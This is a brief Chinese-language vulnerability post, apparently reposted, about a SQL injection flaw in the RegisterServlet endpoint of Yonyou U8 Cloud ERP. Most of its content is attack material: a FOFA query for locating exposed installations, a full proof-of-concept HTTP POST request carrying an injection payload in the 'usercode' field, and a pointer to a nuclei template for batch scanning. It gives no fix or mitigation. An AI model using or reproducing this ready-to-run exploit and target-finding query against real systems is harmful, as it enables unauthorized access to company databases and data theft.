U8 Cloud是用友公司推出的企业上云数字化平台,为成长型和创新型企业提供全面的云ERP解决方案。
该系统RegisterServlet接口存在SQL注入漏洞,攻击者可通过此漏洞未经授权地访问数据库,存在企业数据泄露风险。
fofa查询
app="用友-U8-Cloud"POC
POST /servlet/RegisterServlet HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36Connection: closeContent-Length: 85Accept: */*Accept-Language: enContent-Type: application/x-www-form-urlencodedX-Forwarded-For: 127.0.0.1Accept-Encoding: gzipusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
nuclei批量检测
nuclei检测脚本已经放在了公开POC项目里面:
https://github.com/Vme18000yuan/FreePOC
希望大家下载时候顺便点个star 支持一下
文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498266&idx=2&sn=b9df2bd550cb0aa1b8c20e884175808a&chksm=974c5d22a03bd434725835ce31115237e142ec4cb6b243dbacde83bdac2900caba20af17c00c&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh